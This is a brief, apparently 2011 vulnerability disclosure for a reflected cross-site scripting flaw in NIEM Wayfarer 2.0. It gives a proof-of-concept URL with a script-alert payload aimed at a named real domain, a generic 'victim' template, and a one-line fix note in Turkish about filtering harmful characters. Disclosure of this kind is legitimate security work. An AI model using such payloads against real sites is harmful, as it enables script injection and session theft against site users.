< ------------------- header data start ------------------- >

# Application Name: NIEM Wayfarer 2.0 Cross Site Scripting Vuln.

# Author: Lynch ~ Bug Researchers

# Date: 13.08.2011

# Example: http://www.ncsconline.org/niemwayfarer/search.php?query=<script>alert(document.domain)</script>

# Vulnerable Type: Reflected XSS

# Fixed: Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >

http://victim/niemwayfarer/search.php?query=XSSAttack]

< -- bug code end of -- >

< ------------------- header data end of ------------------- >